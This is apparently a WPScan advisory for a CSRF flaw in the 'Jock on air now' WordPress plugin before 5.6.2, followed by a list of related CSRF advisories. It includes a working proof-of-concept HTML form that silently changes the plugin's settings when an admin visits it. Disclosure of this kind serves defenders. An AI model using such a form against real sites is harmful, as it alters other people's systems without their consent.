Jock on air now < 5.6.2 – Arbitrary Plugin's Settings Update via CSRF | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when saving its settings, allowing attackers to make logged in admin change them to arbitrary values via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=joan_settings" method="POST">
      <input type="hidden" name="joan_options[imagesOn]" value="yes" />
      <input type="hidden" name="joan_options[showUpcoming]" value="yes" />
      <input type="hidden" name="joan_options[offAirMessage]" value="Added Via CSRF" />
      <input type="hidden" name="shut-it-down" value="no" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 5.6.2

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

27428224-a1da-432f-ac84-84b7deb295db

Timeline

Publicly Published

2021-08-18 (about 4 years ago)

Added

2021-08-18 (about 4 years ago)

Last Updated

2021-08-18 (about 4 years ago)

Other

Published

Title

Published

2025-05-16

Title

ShayanWeb Admin FontChanger < 1.10 - Stored XSS via CSRF

Published

2026-03-18

Title

Add Custom Fields to Media < 2.0.4 - Cross-Site Request Forgery to Custom Field Deletion via 'delete' Parameter

Published

2014-08-01

Title

GTranslate 1.0.12 - gtranslate.php Widget Code Editing CSRF

Published

2014-12-18

Title

Simplelife <= 1.2 - Multiple CSRF

Published

2014-08-01

Title

Store Locator < 2.12 - Cross-Site Request Forgery